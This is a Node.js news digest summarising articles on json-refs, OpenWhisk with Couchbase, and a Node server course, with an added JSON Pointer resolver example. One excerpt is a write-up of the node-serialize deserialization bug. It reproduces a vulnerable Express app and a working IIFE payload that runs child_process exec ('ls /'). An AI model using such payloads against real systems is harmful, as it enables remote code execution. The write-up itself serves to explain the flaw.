Your Choice JavaScript News

Node News Monday, February 12

Node News TLDR / Table of Contents

  • whitlockjc/json-refs
    • json-refs – Various utilities for JSON Pointers (http://tools.ietf.org/html/rfc6901) and JSON References (http://tools.ietf.org/html/draft-pbryan-zyp-json-ref-03).
    • issue, references, remote references, circular references,
  • The Most Popular Node.js Tutorials of 2017 | @RisingStack
    • It’s time to close 2017; with this article, we look back on the past year with the best articles of the RisingStack blog. Stay tuned for more in 2018!
    • Node.js, Node.js REST APIs, Node.js application, node.js package managers, new Node features
  • Use OpenWhisk for FaaS with Node.js and Couchbase NoSQL
    • Learn how to create and deploy highly scalable applications as functions using OpenWhisk on Bluemix for FaaS and Couchbase for NoSQL JSON data.
    • function, functions, data, command line, OpenWhisk
  • Node.js: Full application example
    • In this course, you will get introduced to Node.js. You will learn how to install, configure and run the server and how to load various modules.
    • ejs, server, file, data, code
  • Exploiting Node.js deserialization bug for Remote Code Execution
    • tl;dr Untrusted data passed into the unserialize() function in the node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript object with an Immediately Invoked Function Expression (IIFE). The Bug – During a Node…
    • function, code execution, reverse shell
  • Release Notes – v3.0.4…
  • It also means if your reference is escaped, like #/definitions/My%20Pet, it will also work as expected.
  • (Issue #61)
    – Fix an issue with combining options.filter and options.includeInvalid (Issue #63)
    – We now clone the JSON Reference definition and JSON Reference details respectively for options.refPreProcessor and options.refPostProcessor (Issue #64)
    – v2.0.4 (2016-01-21)
    – Fixed a bug where a reference to another object that shares a common…
  • Added #resolveRefsAt to allow you to retrieve a remote document and then resolve its references
    – Fixed a bug where Windows paths containing \ were not processed properly (Issue #48)
    – Removed #resolveLocalRefs
    – Renamed #isJsonPointer to #isPtr
    – Renamed #isJsonReference to #isRef
    – Renamed #pathFromPointer to #pathFromPtr
    – Renamed…

Tags: issue, references, remote references, circular references,
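As an added example (this is not json-refs's own code), the following JavaScript resolves RFC 6901 JSON Pointers the way the release note above describes: the escaped fragment #/definitions/My%20Pet is percent-decoded, the ~1 and ~0 token escapes are applied in the order the RFC requires, and local $ref chains are followed with cycle detection, since a circular reference would otherwise loop forever. The sample document, its key names, and the decision to refuse remote (non-fragment) references are assumptions made for the demo; the last one matters in practice because following attacker-supplied http:// or file:// references from a server is an SSRF/file-read risk.

```javascript
// Added example (not json-refs code): resolve RFC 6901 JSON Pointers given
// as URI fragments (e.g. "#/definitions/My%20Pet") against a local document,
// and follow local "$ref" objects with cycle detection.
"use strict";

// Decode one reference token: percent-decoding first (the fragment is URI
// encoded), then the RFC 6901 escapes. "~1" must be replaced before "~0",
// so that "~01" decodes to "~1" and not to "/".
function decodeToken(token) {
  return decodeURIComponent(token).replace(/~1/g, "/").replace(/~0/g, "~");
}

// Split "#/a/b" or "/a/b" into decoded tokens. "" and "#" address the whole
// document; anything else must start with "/".
function parsePointer(ptr) {
  const body = ptr.startsWith("#") ? ptr.slice(1) : ptr;
  if (body === "") return [];
  if (!body.startsWith("/")) throw new Error("invalid JSON Pointer: " + ptr);
  return body.slice(1).split("/").map(decodeToken);
}

// Walk the document token by token. Arrays accept only canonical decimal
// indices; objects are looked up with hasOwnProperty so "__proto__" and
// "constructor" do not resolve through the prototype chain.
function getByPointer(doc, ptr) {
  let cur = doc;
  for (const tok of parsePointer(ptr)) {
    if (Array.isArray(cur)) {
      if (!/^(0|[1-9][0-9]*)$/.test(tok)) throw new Error("bad array index: " + tok);
      cur = cur[Number(tok)];
    } else if (cur !== null && typeof cur === "object" &&
               Object.prototype.hasOwnProperty.call(cur, tok)) {
      cur = cur[tok];
    } else {
      throw new Error("unresolvable pointer: " + ptr);
    }
  }
  return cur;
}

// Resolve a JSON Reference object ({"$ref": "#/..."}) to its target,
// following chains of references. `seen` detects circular references.
// Remote references are refused here (assumption for the demo): fetching
// attacker-controlled URLs from a server is an SSRF risk.
function resolveRef(doc, refObj, seen = new Set()) {
  let target = refObj;
  while (target !== null && typeof target === "object" && typeof target.$ref === "string") {
    const ref = target.$ref;
    if (!ref.startsWith("#")) throw new Error("remote references are not followed: " + ref);
    if (seen.has(ref)) throw new Error("circular reference: " + ref);
    seen.add(ref);
    target = getByPointer(doc, ref);
  }
  return target;
}

// Constructed sample document (not from the page): an escaped key, a key
// containing "/" (addressed as "a~1b"), and a deliberate reference cycle.
const sampleDoc = {
  definitions: {
    "My Pet": { type: "object", properties: { name: { type: "string" } } },
    "a/b": { value: 42 },
    loopA: { $ref: "#/definitions/loopB" },
    loopB: { $ref: "#/definitions/loopA" }
  },
  pet: { $ref: "#/definitions/My%20Pet" },
  slash: { $ref: "#/definitions/a~1b" }
};
```

Feeding sampleDoc.pet to resolveRef yields the "My Pet" schema object, sampleDoc.slash resolves to the "a/b" entry, and sampleDoc.definitions.loopA throws a "circular reference" error instead of hanging.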

  • In this article we had explored using Amazon's Serverless services to create Lambda functions that interact with Couchbase, our NoSQL database.
  • We're going to see how to create serverless functions using OpenWhisk to communicate with our Couchbase Server database.
  • …js file and include the following JavaScript code: … You're probably seeing the bigger picture now in regards to function creation with OpenWhisk and Couchbase, so we're not going to walk through the above function for deleting documents.
  • If you're on a Mac or a computer with a ZIP CLI, execute the following: … When you have a ZIP of each function, they can be deployed by executing the following: … I introduced some new things in the above command.
  • You just saw how to create a package of serverless functions for OpenWhisk that communicate with the NoSQL database, Couchbase.

Tags: function, functions, data, command line, OpenWhisk

  • Unlike traditional web servers, there is no separation between the web server and our code, and we do not have to customize external configuration files (XML or property files) to get the Node.js web server up.
  • On the Node.js platform, we start up the server as follows: … Let's now discuss the different features in server.js: … Here is a code snippet with which we store the file in the cache store: … Here is a code snippet with which we serve the…
  • The next time any client requests the file, we check whether the file is stored in the cache object and retrieve an object containing the cached data.
  • For better performance, we should stream the file from disk and pipe it directly to the response object, sending data to the network socket one piece at a time.
  • On top of that we have implemented error handling with the following piece of code: … Now the pipe method enables us to take our file from the disk and stream it directly to the socket through the standard response object.

Tags: ejs, server, file, data, code

  • tl;dr – Untrusted data passed into the unserialize() function in the node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript object with an Immediately Invoked Function Expression (IIFE).
  • Here is a sample node.js application to imitate the code:

      var express = require('express');
      var cookieParser = require('cookie-parser');
      var escape = require('escape-html');
      var serialize = require('node-serialize');
      var app = express();
      app.use(cookieParser());

      app.get('/', function(req, res) {
        if (req.cookies.profile) {
          var str = new Buffer(req.cookies.profile, 'base64')…

  • Building the payload: the rce property is an IIFE that calls child_process exec, and the object is then serialized:

      var y = {
        rce : function(){
          require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
        }(),
      }
      console.log("Serialized: \n" + serialize.serialize(y));

    The following output was obtained: … The IIFE worked fine but the serialization failed (the IIFE runs while y is being built, so rce holds its return value, undefined, rather than a function for serialize() to flag).
  • So we have the exploit, crafted by hand by appending () to the serialized function string:

      {"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

    Passing it to the unserialize() function will result in code execution.
  • The same payload fed to unserialize() directly:

      var serialize = require('node-serialize');
      var payload = '{"rce":"_$$ND_FUNC$$_function (){ require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) }); }()"}';
      serialize.unserialize(payload);

    We know that we can exploit the unserialize() function in the node-serialize module if untrusted data is passed into it.

Tags: function, code execution, reverse shell

The Complete Node.js Developer Course (2nd Edition) (60,232 students enrolled)

By Andrew Mead
  • Build, test, and launch Node apps
  • Create Express web servers and APIs
  • Store data with Mongoose and MongoDB
  • Use cutting-edge ES6/ES7 JavaScript
  • Deploy your Node apps to production
  • Create real-time web apps with SocketIO

Learn more.


Angular (Angular 2+) & NodeJS - The MEAN Stack Guide (26,806 students enrolled)

By Maximilian Schwarzmüller
  • Build real Angular + NodeJS applications
  • Understand how Angular works and how it interacts with Backends
  • Connect any Angular Frontend with a NodeJS Backend
  • Use MongoDB with Mongoose to interact with Data on the Backend
  • Use ExpressJS as a NodeJS Framework
  • Provide a great user experience by using Optimistic Updating on the Frontend
  • Improve any Angular (+ NodeJS) application by adding Error Handling

Learn more.

